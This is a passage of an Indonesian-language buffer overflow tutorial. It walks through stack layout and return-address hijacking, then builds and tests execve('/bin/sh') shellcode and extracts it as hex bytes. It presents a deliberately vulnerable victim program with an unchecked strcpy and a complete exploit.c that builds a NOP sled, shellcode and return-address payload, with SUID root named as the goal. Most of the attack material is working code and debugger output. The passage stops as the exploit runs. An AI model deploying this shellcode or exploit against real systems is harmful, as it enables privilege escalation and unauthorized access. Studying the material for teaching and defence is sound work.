Akses terhadap argumen yang diberikan, dapat dilihat
dalam listing func5 sbb:

func5:
pushl %ebp ; >prolog
movl %esp,%ebp ;
subl $56,%esp ; >prologue_set_stack_ptr

movb $48,-1(%ebp) ; -buf50[0] = '0'
movb $100,-8(%ebp) ; -buf51[0] = 100
movb $102,-6(%ebp) ; -buf51[0] = 102
movb $-56,-16(%ebp) ; -buf52[0] = 200 (unsigned)
movb $-52,-12(%ebp) ; -buf52[0] = 204 (unsigned)
movb $30,-24(%ebp) ; -buf53[0] = 30
movb $36,-18(%ebp) ; -buf53[0] = 36
movb $40,-36(%ebp) ; -buf54[0] = 40
movb $48,-28(%ebp) ; -buf54[0] = 48

leave ; >epilog
ret ; >

Gambarannya adalah sebagai berikut. Supaya mudah, kita asumsikan
bahwa posisi stack sebelum pemanggilan fungsi adalah 100 (Di
bawah ini hanya ditunjukkan sampai buf53), Ternyata dalam
mengalokasikan variabel lokal, dilakukan alignment 4 atau dword,
untuk string yang berisi lebih dari 3 character, sementara yang
isinya cuma 1 char tidak dialign sama sekali, coba tuh lihat
dibawah, buf50 mepet banget sama BP.

gambar-3.1b.
>buf53< buf52 buf51 buf50 <---arguments--->
| | ^ ^ ^ ^ ^ | main()
____//______|_____|_|___|___|_|____||_______|_______________|
// dst. 3333333 22222 111 0| | | | | | |
// | |X| |XXX| |XXXX||BP |RET| I | L | S |XXX|
____//______|_____|_|___|___|_|____||___|___|___|___|___|___|
// | | | | |
000 52 68 84 100

legenda:
X: slack/tidak digunakan akibat alignment
BP: Base Pointer
I, L dan S: parameter yang dimasukkan
RET: Return Address

Oh iya nanti lupa, seperti kita lihat diatas, posisi argumen/
parameter adalah di sebelah kanan BP, jadi diakses dengan offset
positif terhadap BP, sebaliknya dengan variabel lokal.

Eh... ngomong-ngomong, memang ada gunanya enggak sih, mengerti
tentang hal itu? Hm.. enggak ada ya :(

3.2. Mengalihkan Return Address

Mumpung masih hangat, mari kita coba membuat sebuah contoh
bagaimana caranya memotong kayu (lho? maaf barusan teringat lagu
TK hai tukang kayu), maksud saya adalah mengalihkan alur program
dengan cara merubah nilai return address yang tersimpan di stack.
Agar lebih mudah kita pakai saja variabel yang mepet ke BP diatas
tadi (bedanya cuma 1).

Seperti kita tahu bahwa besarnya stack yang dialokasikan untuk
mengamankan BP adalah sebesar 4 poin/byte. Dan disebelahnya
saudara-saudara... adalah...: Return Adress!!!

Untuk melaksanakan rencana jahat kita ini, kita perlu bantuan
sebuah pointer agar nanti bisa kita rubah seenak udel kita.

kira-kira nanti begini:

char buf0[1];
/* ingat, diatas itu tidak beda dengan: char * buf0 */
/* jadi masih sodara-an lah sama int * ret dibawah */
int * ret;

kemudian kita arahkan ret ke return address: tolong harap diingat
bahwa penambahan di bawah ini adalah untuk pointer ke character /
1 byte. untuk tipe lain, akan berbeda pula incrementasi-nya,
untuk pointer ke integer, misalnya, setiap penambahan 1 poin akan
menggeser pointer sebanyak 4 byte / lokasi address.

ret = buf0 +1 +4;

atau kalo gcc rewel, bisa kita cast sebagai:

(char *) ret = buf0 +1 +4;

akhirnya kita ubah return address :)

*ret = (hm... berapa ya?)

sebaiknya kita gunakan variabel saja supaya gampang diubah,
sehingga lengkapnya program kita adalah:

contoh3.c
------------------------------------------------------------
void func(int I) {
char buf0[1];
int * ret;

ret = buf0 +1 +4;
(*ret) += I;
}

int main(int argc, char *argv[]) {
char * shell[2];
int i = 0;

if (argc > 1) i = atoi(argv[1]);

shell[0]="/bin/sh";
shell[1]="/usr/local/bin/bash";

func(i);

printf("print#1: lokasi1: %X\n", &shell[0]); /* print#1 */
printf("print#2: lokasi2: %X\n", &shell[1]); /* print#2 */
printf("print#3: shell1: %s\n", shell[0]); /* print#3 */
printf("print#4: shell2: %s\n", shell[1]); /* print#4 */

return(0);
}
------------------------------------------------------------

Program diatas akan memindahkan alur program sejauh input yang
kita berikan. Jangan terlalu diperhatikan baris-baris perintah
main() sebelum pemanggilan func. itu cuma inisialisasi serta
pengechekan input.

setelah pemanggilan fungsi func *seharusnya* program melaksanakan
perintah berikutnya yaitu print#1, tapi jika kita inputkan suatu
nilai tertentu sebagai argument maka program akan dilompatkan
sejauh nilai yang kita berikan.

[aa]$./contoh3
print#1 lokasi1: BFBFFBA8
print#2 lokasi2: BFBFFBAC
print#3 shell1: /bin/sh
print#4 shell2: /usr/local/bin/bash

kita coba beberapa buah nilai:

[aa]$./contoh3 1
Bus error (core dumped)
[aa]$./contoh3 2
Segmentation fault (core dumped)
[aa]$./contoh3 4
Illegal instruction (core dumped)
[aa]$./contoh3 100
Segmentation fault (core dumped)
[aa]$./contoh3 1000
Segmentation fault (core dumped)
[aa]$./contoh3 -1
Bus error (core dumped)
[aa]$./contoh3 -100
[aa]$./contoh3 -1000
Segmentation fault (core dumped)

Maksudnya apa sih?

Oh iya, saya belum cerita ya? maksudnya kita mau mencoba untuk
(misalnya) melompat langsung kepada printf#3, melewati print#1
dan print#2.

kita debug saja deh...

[aa]$gdb -q contoh3
(gdb)
(gdb) disass main
Dump of assembler code for function main:
0x80481ec <main>: push %ebp
0x80481ed <main+1>: mov %esp,%ebp
0x80481ef <main+3>: sub $0x18,%esp
0x80481f2 <main+6>: movl $0x0,0xfffffff4(%ebp)
0x80481f9 <main+13>: cmpl $0x1,0x8(%ebp)
0x80481fd <main+17>: jle 0x8048218 <main+44>
0x80481ff <main+19>: add $0xfffffff4,%esp
0x8048202 <main+22>: mov 0xc(%ebp),%eax
0x8048205 <main+25>: add $0x4,%eax
0x8048208 <main+28>: mov (%eax),%edx
0x804820a <main+30>: push %edx
0x804820b <main+31>: call 0x80483c8 <atoi>
0x8048210 <main+36>: add $0x10,%esp
0x8048213 <main+39>: mov %eax,%eax
0x8048215 <main+41>: mov %eax,0xfffffff4(%ebp)
0x8048218 <main+44>: movl $0x8052c8c,0xfffffff8(%ebp)
0x804821f <main+51>: movl $0x8052c94,0xfffffffc(%ebp)
0x8048226 <main+58>: add $0xfffffff4,%esp
0x8048229 <main+61>: mov 0xfffffff4(%ebp),%eax
0x804822c <main+64>: push %eax
0x804822d <main+65>: call 0x80481c4 <func>
0x8048232 <main+70>: add $0x10,%esp
0x8048235 <main+73>: add $0xfffffff8,%esp
0x8048238 <main+76>: lea 0xfffffff8(%ebp),%eax
0x804823b <main+79>: push %eax
0x804823c <main+80>: push $0x8052ca8
0x8048241 <main+85>: call 0x80483e0 <printf>
0x8048246 <main+90>: add $0x10,%esp
0x8048249 <main+93>: add $0xfffffff8,%esp
0x804824c <main+96>: lea 0xfffffff8(%ebp),%eax
0x804824f <main+99>: lea 0x4(%eax),%edx
0x8048252 <main+102>: push %edx
0x8048253 <main+103>: push $0x8052cb6
0x8048258 <main+108>: call 0x80483e0 <printf>
---Type <return> to continue, or q <return> to quit---
0x8048260 <main+116>: add $0xfffffff8,%esp
0x8048263 <main+119>: mov 0xfffffff8(%ebp),%eax
0x8048266 <main+122>: push %eax
0x8048267 <main+123>: push $0x8052cc4
0x804826c <main+128>: call 0x80483e0 <printf>
0x8048271 <main+133>: add $0x10,%esp
0x8048274 <main+136>: add $0xfffffff8,%esp
0x8048277 <main+139>: mov 0xfffffffc(%ebp),%eax
0x804827a <main+142>: push %eax
0x804827b <main+143>: push $0x8052cd1
0x8048280 <main+148>: call 0x80483e0 <printf>
0x8048285 <main+153>: add $0x10,%esp
0x8048288 <main+156>: xor %eax,%eax
0x804828a <main+158>: jmp 0x804828c <main+160>
0x804828c <main+160>: leave
0x804828d <main+161>: ret
End of assembler dump.
(gdb) q
[aa]$

Cuekin saja baris-baris kode diatas tidak kita perlukan, Yang
kita butuh adalah address setelah func dipanggil (address ini
di-push ke stack pada saat pemanggilan func, nilai inilah yang
kita rubah dalam fungsi func)

.
0x804822d <main+65>: call 0x80481c4 <func>
0x8048232 <main+70>: add $0x10,%esp
.

...serta address setelah print#2 dipanggil. kita akan
mengalihkan alur program ke sini.

.
0x8048258 <main+108>: call 0x80483e0 <printf>
0x804825d <main+113>: add $0x10,%esp
.

Untuk mengalihkan alur program dari address pertama diatas kepada
address kedua, berarti return address harus diubah (ditambah)
sebesar selisih antara keduanya.

Dengan aljabar sederhana kita peroleh displacement offsetnya
adalah sebesar: <main+113> - <main+70> = 113 - 70 = 43

Mari kita coba sekali lagi...

[aa]$./contoh3 43
print#3: shell1: /bin/sh
print#4: shell2: /usr/local/bin/bash
[aa]$

OK! :))

3.3. Exec Syscall

Setelah sukses pertama membelokkan alur program ke tempat yang
kita kehendaki selanjutnya kita perlu memilih apa yang akan kita
jalankan dan dimana ditempatkannya. Umumnya program akan
diarahkan untuk menjalankan shell /bin/sh, karena dari situ
praktis kita dapat menjalankan yang lainnya terserah kita,
apalagi jika program yang diekploit tersebut SUID root maka tunai
sudah suratan, dan mereka hidup bahagia selamanya sampai akhir
hayat. eng- ing- eeeng...

untuk spawning shell code kita lihat lihat dan pelajari prototype
dari fungsi execve(2).

[aa]$man execve

NAME
execve - execute a file

LIBRARY
Standard C Library (libc, -lc)

SYNOPSIS
#include <unistd.h>

int
execve(const char *path, char *const argv[], char *const envp[]);

DESCRIPTION
Execve() transforms the calling process.. bla-bla-bla...

Fungsi ini adalah embahnya fungsi-fungsi exec yang lain,
front-end-nya bisa berupa execl, execlp, execle, exect, execv
dan execvp. Jika execve sukses dijalankan, selanjutnya program
kita bisa jalan sendiri tidak perlu lagi balik atau terikat oleh
proses yang memanggilnya. Cocok-lah dengan keinginan kita :)

arg1 (path) harus berisi path string lengkap dari program yang
akan kita jalankan, sementara arg2 (argv), adalah argumen list
(array dari strings alias pointer ke pointer).
Kedua argumen ini *harus* diisi dengan benar.

kita isi arg1 (path) dengan string "/bin/sh" (shell), dan arg2
dengan pointer ke string tsb. dengan NULL sebagai terminator.

baca-baca juga manual exit(3) dan _exit(2) ya?

langsung saja kita lihat program berikut listing assembly-nya:

contoh4.c
------------------------------------------------------------
#include <unistd.h>

int main() {
char * sh[2];
sh[0] = "/usr/bin/perl";
sh[1] = NULL;
execve(sh[0], sh, NULL);
_exit(0);
}
------------------------------------------------------------

Hm... sebentar, kita bahas dulu dua instruksi assembler yang agak
mirip-mirip, dan bisa membingungkan bahkan menyesatkan yaitu MOV
mem,reg dengan LEA mem,reg: LEA artinya Load Effective Address,
sementara MOV artinya menyalin/mengkopi isi memori/register.

gambar-3.3.
____//___________________________
// |1|3|5|7|9|A|C|E|
// |2|4|6|8|0|B|D|F|
____//_____|_|_|_|_|_|_|_|_|_____
// | |
000 92 100

misalkan jika nilai SP sekarang adalah 92, maka instruksi MOVL
%ESP,%EAX akan menyalin *isi* ESP seukuran dword atau 12345678
kedalam EAX. jadi, EAX=12345678, sedangkan LEAL %ESP,%EAX akan
menyalin *address* ESP atau 00000092 ke dalam EAX. jadi,
EAX=00000092.

Dalam syntax intel, instruksi LEA EAX,ESP identik dengan
mov EAX, OFFSET [ESP]

Dalam syntax att, jika operand untuk mov memakai prefix ($)
maka yang diambil adalah: address-nya. Sebaliknya jika tidak
memakai prefix, maka yang diambil adalah: isi-memori-nya

movl $var,%eax => EAX = address var
movl var,%eax => EAX = nilai/isi memori dari var

hati-hati, immediate operand (biasanya berupa angka), justru
menggunakan prefix $ seperti dalam: movl $-123,%eax, artinya
menjadikan EAX bernilai -123.

Sebaliknya untuk pengalamatan tidak langsung oleh register,
notasinya adalah memakai tanda kurung.

mov (%ebx),%eax : salin isi memory yang alamatnya ditampung
oleh BX. nilai BX = address.
mov %ebx,%eax : salin nilai BX kedalam AX

Kita lihat bahwa offset memory sama dengan nilai BX itu sendiri,
jadi jika/selama tidak terdapat displacement lainnya dalam base
indexing, maka instruksi: "lea (%ebx),%eax" hasilnya adalah sama
saja dengan instruksi: "mov %ebx,%eax"

begitu kira-kira, bingun? yah enggak apa-lah, saya juga enggak
yakin he-he-he.

(enggak deh, bo-ong,.. cuma becanda, segitu aja marah, bener
begitu koq. sungguh deh... please...)

udah ah, kita lanjut... listingnya adalah sbb:

------------------------------------------------------------
DATA
.LC0:
.byte 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x0

TEXT/CODE
main:
pushl %ebp ;>prolog
movl %esp,%ebp ;>
subl $24,%esp ;>

movl $.LC0,-8(%ebp) ; address sh[0] / .LC0 / "/bin/sh"
; disimpan ke stack
movl $0,-4(%ebp) ; address sh[1] / NULL disimpan ke stack

addl $-4,%esp ;>offset penala stack
pushl $0 ; arg3 = NULL
leal -8(%ebp),%eax ; AX = address [BP-8]
pushl %eax ; arg2 = offset address [BP-8]
movl -8(%ebp),%eax ; AX = isi memori dari [BP-8]
pushl %eax ; arg1 = address "/bin/sh"
call execve
addl $16,%esp ;>penala stack

addl $-12,%esp ;>offset penala stack
pushl $0 ; arg1
call _exit
addl $16,%esp ;>penala stack
.L2:
leave
ret
------------------------------------------------------------

Kita ambil beberapa baris assembly yang kita perlukan untuk
menyusun program kita, yaitu pemanggilan spawning dengan execve
dan clean exit

[aa]$gdb -q contoh4
(gdb) disass main
Dump of assembler code for function main:
0x80481d8 <main>: push %ebp
0x80481d9 <main+1>: mov %esp,%ebp
0x80481db <main+3>: sub $0x18,%esp
0x80481de <main+6>: movl $0x8049c41,0xfffffff8(%ebp)
0x80481e5 <main+13>: movl $0x0,0xfffffffc(%ebp)
0x80481ec <main+20>: add $0xfffffffc,%esp
0x80481ef <main+23>: push $0x0
0x80481f1 <main+25>: lea 0xfffffff8(%ebp),%eax
0x80481f4 <main+28>: push %eax
0x80481f5 <main+29>: mov 0xfffffff8(%ebp),%eax
0x80481f8 <main+32>: push %eax
0x80481f9 <main+33>: call 0x8048360 <execve>
0x80481fe <main+38>: add $0x10,%esp
0x8048201 <main+41>: add $0xfffffff4,%esp
0x8048204 <main+44>: push $0x0
0x8048206 <main+46>: call 0x804834c <_exit>
0x804820b <main+51>: add $0x10,%esp
0x804820e <main+54>: mov %esi,%esi
0x8048210 <main+56>: leave
0x8048211 <main+57>: ret
End of assembler dump.
(gdb) gdb execve
Undefined command: "gdb". Try "help".
(gdb) oops
Undefined command: "oops". Try "help".
(gdb) disass execve
Dump of assembler code for function execve:
0x8048360 <execve>: lea 0x3b,%eax
0x8048366 <execve+6>: int $0x80
0x8048368 <execve+8>: jb 0x8048358 <_exit+12>
0x804836a <execve+10>: ret
0x804836b <execve+11>: nop
0x804836c <execve+12>: push %ebp
0x804836d <execve+13>: mov %esp,%ebp
0x804836f <execve+15>: sub $0xc,%esp
0x8048372 <execve+18>: push %edi
.
.
(dan seterusnya beberapa lembar)
(gdb) disass exit
Dump of assembler code for function exit:
0x804991c <exit>: push %ebp
0x804991d <exit+1>: mov %esp,%ebp
0x804991f <exit+3>: sub $0xc,%esp
0x8049922 <exit+6>: push %edi
0x8049923 <exit+7>: push %esi
0x8049924 <exit+8>: push %ebx
0x804992d <exit+17>: je 0x804994a <exit+46>
0x804992f <exit+19>: nop
.
.
(dan seterusnya... salah. mustinya "_exit", bukan "exit")
(gdb) disass _exit
Dump of assembler code for function _exit:
0x804834c <_exit>: lea 0x1,%eax
0x8048352 <_exit+6>: int $0x80
0x8048354 <_exit+8>: ret
0x8048355 <_exit+9>: lea 0x0(%esi),%esi
0x8048358 <_exit+12>: jmp 0x8049a34 <.cerror>
0x804835d <_exit+17>: lea 0x0(%esi),%esi
End of assembler dump.
(gdb) q
[aa]$

3.4. Shellcode

Nah sekarang kita cukup punya bahan. Menggunakan trik lama, kita
masukkan address string ke stack dengan perintah: "call".

contoh5.c (assembler code)
------------------------------------------------------------
pushl $0 ; address NULL
jmp shell ; ambil address stringz "/bin/sh"

mulai:
pushl $0 ; arg3 (SP berkurang 4)
leal 4(%esp),%eax ; jadi address string berada di SP+4
pushl %eax ; masukkan ke arg2 (SP berkurang lagi 4)
mov 8(%esp),%eax ; address string sekarang di SP+8
pushl %eax ; masukkan sebagai arg 1
sub $4,%esp ; dummy-ret (buat syscall)
mov $0x3b,%eax ; service number 0x3b = execve
int $0x80 ; syscall
add $16,%esp ; penala stack
add $8,%esp ; offset untuk ret & push 0 diatas

pushl $0
sub $4,%esp
mov $0x1,%eax
int $0x80

add $8,%esp

jmp CIAO

shell:
call (mulai) ; address stringz "/bin/sh"
.asciz \"/bin/sh\" ; disimpan ke stack (SP)
CIAO:
------------------------------------------------------------

lalu tinggal kita masukkan ke dalam block assembler int main() {
asm(" xxxx "); }, selesailah sudah :) mari kita test hasilnya:

[aa]$./contoh5
$ echo "Hello shell!"
Hello shell!
$ exit
[aa]$

Lalu kita ambil kode-bytenya dengan debugger.
Catatan: supaya kelihatan rapi sebaiknya gunakan mode layar
minimal 86 kolom. saran saya gunakan x windows atau pake putty
telnet, tinggal copy-paste :)

[aa]$gdb -q contoh5
(gdb) set disass intel
(gdb) disass main
Dump of assembler code for function main:
0x80481d8 <main>: push %ebp
0x80481d9 <main+1>: mov %esp,%ebp
0x80481db <main+3>: push $0x0
0x80481dd <main+5>: jmp 0x804820c <shell>
0x80481df <mulai>: push $0x0
0x80481e1 <mulai+2>: lea 0x4(%esp,1),%eax
0x80481e5 <mulai+6>: push %eax
0x80481e6 <mulai+7>: mov 0x8(%esp,1),%eax
0x80481ea <mulai+11>: push %eax
0x80481eb <mulai+12>: sub $0x4,%esp
0x80481ee <mulai+15>: mov $0x3b,%eax
0x80481f3 <mulai+20>: int $0x80
0x80481f5 <mulai+22>: add $0x10,%esp
0x80481f8 <mulai+25>: add $0x8,%esp
0x80481fb <mulai+28>: push $0x0
0x80481fd <mulai+30>: sub $0x4,%esp
0x8048200 <mulai+33>: mov $0x1,%eax
0x8048205 <mulai+38>: int $0x80
0x8048207 <mulai+40>: add $0x8,%esp
0x804820a <mulai+43>: jmp 0x8048219 <CIAO>
0x804820c <shell>: call 0x80481df <mulai>
0x8048211 <shell+5>: das
0x8048212 <shell+6>: bound %ebp,0x6e(%ecx)
0x8048215 <shell+9>: das
0x8048216 <shell+10>: jae 0x8048280 <atexit+100>
0x8048218 <shell+12>: add %cl,%cl
0x804821a <CIAO+1>: ret
End of assembler dump.
(gdb) print CIAO - (main+3)
$1 = 62 (jumlah byte yang perlu didump)
(gdb) x/62b main+3
0x80481db <main+3>: 0x6a 0x00 0xeb 0x2d 0x6a 0x00 0x8d 0x44
0x80481e3 <mulai+4>: 0x24 0x04 0x50 0x8b 0x44 0x24 0x08 0x50
0x80481eb <mulai+12>: 0x83 0xec 0x04 0xb8 0x3b 0x00 0x00 0x00
0x80481f3 <mulai+20>: 0xcd 0x80 0x83 0xc4 0x10 0x83 0xc4 0x08
0x80481fb <mulai+28>: 0x6a 0x00 0x83 0xec 0x04 0xb8 0x01 0x00
0x8048203 <mulai+36>: 0x00 0x00 0xcd 0x80 0x83 0xc4 0x08 0xeb
0x804820b <mulai+44>: 0x0d 0xe8 0xce 0xff 0xff 0xff 0x2f 0x62
0x8048213 <shell+7>: 0x69 0x6e 0x2f 0x73 0x68 0x00
(gdb)q
[aa]$

hmm... tapi, masih banyak byte 00 di dalamnya, ini tidak bagus
buat BO, string yang akan kita inputkan bisa putus di tengah
jalan. Tapi tidak apalah, ini cuma sekedar contoh, banyak
shelcodes berserakan di rimba kang-ouw, tinggal kita pungut mana
yang kita mau sesuai OS target.

3.5. Merapikan Shellcode

Shellcode yang efektif, menghasilkan kode byte yang tidak
mengandung karakter kontrol (0 - 0x1F), malah kalau bisa juga
tidak mengandung simbol-simbol tertentu seperti backslash (\),
single/doublequotes ('/"), anglebracket (<>) dsb.

Trik-trik yang bisa digunakan a.l.:
1. mengganti perintah MOV X dengan pasangan PUSH/POP
2. menggunakan XOR untuk mereset nilai (membuatnya 0)
3. mengganti perintah ADD N dengan SUB -N

lain-lain:
- jika menggunakan displacement index, perbesar/tambah
offset hingga lebih dari 0x20
- usahakan jumlah kode-byte merupakan kelipatan 4

Shellcode dibawah ini memodifikasi kodenya sendiri (self-
modifying) yaitu dengan mengisi NULL dibelakang "/bin/sh", serta
menyimpan nilai di dua lokasi memori setelahnya (seukuran 2
pointer atau 8 byte). Jadi, program dibawah ini tidak bisa
langsung dijalankan, (hanya untuk diambil code-byte-nya saja).

contoh6.c
------------------------------------------------------------
int main() {
asm("
jmp store

mulai:
popl %edi # salin address \"/bin/sh\" ke DI
pushl %edi # simpan lagi ke stack
xorl %eax,%eax # reset EAX
sub $-7,%edi # incar ujung string \"/bin/sh\"
cld
stosb # ASCIIZ \"/bin/sh\"
popl %eax # salin address \"/bin/sh\" ke EAX
stosl # simpan ke memory storage1
xorl %eax,%eax # reset EAX
stosl # simpan ke memory storage2

param:
pushl %eax # -> arg3

leal -8(%edi),%esi # ESI = address storage1
pushl %esi # -> arg2
movl -8(%edi),%esi # ESI = isi memori storage1
pushl %esi # -> arg3
// alternatif lain, lebih singkat:
// add $-8,%edi
// pushl %edi
// pushl (%edi)

pushl %eax # dummy, syscall ret-address
movb $0x3b,%al # service call = 3B
int $0x80 # syscall
sub $-0x16,%esp

// dipotong, biar irit:
// xorl %eax,%eax # reset EAX
// pushl %eax # arg1
// pushl %eax # dummy
// inc %eax # service call = 01
// int $0x80 # syscall
// sub $-8,%esp

leave
ret

store:
call mulai
shell:
.ascii \"/bin/sh0\",
storage1:
.ascii \"1234\"
storage2:
.ascii \"5678\"
CIAO:
");
}
------------------------------------------------------------

[aa]$gcc -o contoh6 contoh6.c
[aa]$echo "print CIAO - (main+3)" | gdb -q contoh6
(gdb) $1 = 56
(gdb) [aa]
[aa]$echo "x/56b main+3" | gdb -q contoh6
(gdb) 0x80481db <main+3>: 0xeb 0x21 0x5f 0x57 0x31 0xc0 0x83 0xef
0x80481e3 <mulai+6>: 0xf9 0xfc 0xaa 0x58 0xab 0x31 0xc0 0xab
0x80481eb <param>: 0x50 0x8d 0x77 0xf8 0x56 0x8b 0x77 0xf8
0x80481f3 <param+8>: 0x56 0x50 0xb0 0x3b 0xcd 0x80 0x83 0xec
0x80481fb <param+16>: 0xea 0xc9 0xc3 0xe8 0xda 0xff 0xff 0xff
0x8048203 <shell>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x30
0x804820b <storage1>: 0x31 0x32 0x33 0x34 0x35 0x36 0x37 0x38
(gdb) [aa]$

setelah kita lihat formatnya, langsung kita copy saja ke file
contoh7.c supaya tidak repot

[aa]$echo "x/56b main+3" | gdb -q contoh6 |\
> sed -E s/"^.*:(.*)"/"\"\1\""/g |\
> sed -E s/"[[:space:]]0"/"\\\\"/g |\
> tee contoh7.c
"\xeb\x21\x5f\x57\x31\xc0\x83\xef"
"\xf9\xfc\xaa\x58\xab\x31\xc0\xab"
"\x50\x8d\x77\xf8\x56\x8b\x77\xf8"
"\x56\x50\xb0\x3b\xcd\x80\x83\xec"
"\xea\xc9\xc3\xe8\xda\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38"
(gdb)
[aa]$

lalu kita edit.

contoh7.c
------------------------------------------------------------
char shell[] =
"\xeb\x21\x5f\x57\x31\xc0\x83\xef"
"\xf9\xfc\xaa\x58\xab\x31\xc0\xab"
"\x50\x8d\x77\xf8\x56\x8b\x77\xf8"
"\x56\x50\xb0\x3b\xcd\x80\x83\xec"
"\xea\xc9\xc3\xe8\xda\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38"
;

int main() {
int *ret;
ret = (int*) &ret + 2; // 2 pointer ke long integer
// = 8 bytes
(*ret) = (int) shell;
}
------------------------------------------------------------

Selanjutnya dikompile dan langsung dicoba:

[aa]$gcc -o contoh7 contoh7.c
[aa]$./contoh7
$ => (INI ADALAH SHELL)
OK, kita sudah masuk kedalam shellcode

$ who am i
aa ttyp2 Feb 11 00:54 (aa)
$ uname -prs
Annix 4.56-CANTIX i386
$ make love
make: don't know how to make love. Stop
$ echo Inul Daratista have a better asses than pinguin
$ Inul Daratista have a better asses than pinguin
$ exit
[aa]$

3.6. Exploit

Pada saat sebuah fungsi dijalankan, dimanapun levelnya berada,
awalnya nilai SP-nya selalu sama (nilainya tergantung kepada OS
ybs.). Seperti diketahui, return value dari sebuah fungsi
diperoleh dari nilai register AX, maka dengan menyalin SP ke AX,
kita dapat mengambil nilai SP untuk diproses lebih lanjut.

unsigned long SP(void) {
asm("movl %esp,%eax");
}

Namun sayangnya kita tidak tahu posisi sebenarnya dari buffer
yang akan kita overflow, jadi mau tidak mau ya harus dikira-kira
saja sendiri :). Misalnya seperti gambar di bawah ini, jika bufY
adalah buffer yang exploitable, maka posisinya di stack adalah SP
minus seluruh offset dari buf1 s.d. bufY. Oleh sebab itulah dalam
program nanti kita perlu menambah satu variabel yang bisa merubah
offset stack ini.

gambar-3.6a.
____________________________//___________________|___
| | bufY | | | | |
| bufZ |exploitable| bufX buf1 |buf0|BP |RET|
__|______|___________|______//______|____|___|___|___
|

Tujuan utama kita adalah menimpa return-address yang disimpan di
stack agar mengarah kembali ke SP yang berisi shellcode kita.
Untuk menambah peluang keberhasilan, kita bungkus shellcode
dengan deretan NOP di depannya serta barisan return-address di
belakangnya.

gambar-3.6b.
_________|______________________________________________
| | | |
| bufZ | NOPs.. | Shellcode | Return Adresses..
__|______|___________|_______________|__________________
| |
|JMP
|<------------------------

Pada umumnya address alignment adalah 4, artinya data disimpan
dalam address memori dalam kelipatan 4, intel sendiri, dengan
alasan performansi, memang menyarankan minimal dalam word
boundary (kelipatan 2), dalam praktek, compiler seperti gcc malah
melipatnya dalam 8 atau 16 (seperti kita lihat pada contoh-contoh
diatas yang melakukan perapian stack dalam kelipatan 16 (biasa
disebut juga 1 paragraph). Dalam program exploit nanti, kita akan
mengakomodasi kemungkinan anomali atas address alignment, buat
mengakali program-program yang mungkin dikompile secara tidak
standar atau dipatch secara biner sembarangan, udik, kampungan,
dsb. dsb.

Oke deh kakak, untuk menguji shellcode, kita buat dulu sebuah
program yang secara tidak senonoh, menyalin argumen ke buffernya
tanpa melakukan pengechekan dhulu sebhelumnyha:

victim.c
------------------------------------------------------------
#define EXPLOITABLE_BUFFER_SIZE 256

int main(int argc, char *argv[]) {
char msg[]="no argumen specified";
char memble[EXPLOITABLE_BUFFER_SIZE];
strcpy(memble, argc > 1 ? argv[1] : msg);
printf("%s\n", memble);
}
------------------------------------------------------------

Selanjutnya kita buat program yang menyalin exploit kode ke
environment, yang lantas bisa kita inputkan nantinya (supaya
tidak perlu diketik manual), sebagai argumen untuk program
victim diatas.

Program ini dapat dipanggil dengan argumen kustomisasi yaitu
[bufsize] [offset] [alignment] dengan nilai default: 512 0 0

exploit.c
------------------------------------------------------------
#define DEFAULT_BUFSIZE 512
#define DEFAULT_OFFSET 0
#define ALIGNMENT 0
#define ENV_STRING "BUF"
#define NOP 0x90
#define midpointer(X) ((X>>3)<<2)

char shell[] =
"\xeb\x1f\x5f\x57\x31\xc0\x83\xef"
"\xf9\xfc\xaa\x58\xab\x31\xc0\xab"
"\x50\x83\xc7\xf8\x57\xff\x37\x50"
"\xb0\x3b\xcd\x80\x83\xec\xea\xc9"
"\xc3\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x30\x31\x32"
"\x33\x34\x35\x36\x37\x38"
;

/*
char shell_new[] =
// yang ini lebih singkat
"\xeb\x1f\x5f\x57\x31\xc0\x83\xef"
"\xf9\xfc\xaa\x58\xab\x31\xc0\xab"
"\x50\x83\xc7\xf8\x57\xff\x37\x50"
"\xb0\x3b\xcd\x80\x83\xec\xea\xc9"
"\xc3\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x30\x31\x32"
"\x33\x34\x35\x36\x37\x38"
;

char shell_old[] =
// yang ini lebih portable
"\xeb\x21\x5f\x57\x31\xc0\x83\xef"
"\xf9\xfc\xaa\x58\xab\x31\xc0\xab"
"\x50\x8d\x77\xf8\x56\x8b\x77\xf8"
"\x56\x50\xb0\x3b\xcd\x80\x83\xec"
"\xea\xc9\xc3\xe8\xda\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38"
;
*/

int SP(void) {
asm("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
char
*B, // memory allocated for buffer
*pb; // intermediate pointer for buffer
long
X, // return-address as number
*px; // counter pointer

int i,
bufsize, mid, offsize, align,
codelength = strlen(shell);

bufsize = argc > 1 ? atoi(argv[1]) : DEFAULT_BUFSIZE;
if (bufsize < codelength) bufsize = DEFAULT_BUFSIZE;
offsize = argc > 2 ? atoi(argv[2]) : DEFAULT_OFFSET;
align = argc > 3 ? atoi(argv[3])%4 : ALIGNMENT;
mid = bufsize-midpointer(bufsize);

if (B = (char*) malloc(bufsize + 1)) {
memset(B, NOP, mid);
pb = B;
}
else exit(1);

X = SP() - offsize;

printf("shellcode=\n%s\n", shell);
printf("codelength=%u, bufsize=%u, mid=%u (%u-%u)\n",
codelength, bufsize, mid, bufsize, bufsize-mid);
printf("ESP: x%X, Offset: %u (x%X), Effective: x%X, ",
X+offsize, offsize, offsize, X);
printf("Alignment %u\n", align);
printf("Environment variable: \"%s\"\n", ENV_STRING);

(char *) px = (pb + mid + align);

for (i = mid; i < bufsize; i+=4) // size of pointer
*(px++) = X; // = 4 bytes

pb = B + mid - midpointer(codelength);

for (i = 0; i < codelength; i++)
*(pb++) = shell[i];

B[bufsize] = '\0';

setenv(ENV_STRING, B, 1);
system(getenv("SHELL"));

}
------------------------------------------------------------
[aa]$gcc -o exploit exploit.c

Dengan contoh exploitable-buffer sebesar 256 bytes pada program
victim diatas, kita coba program exploit untuk mengeset
environment variabel BUF dengan exploit-code yang panjangnya 300
(bytes)

[aa]$./exploit 300
shellcode=
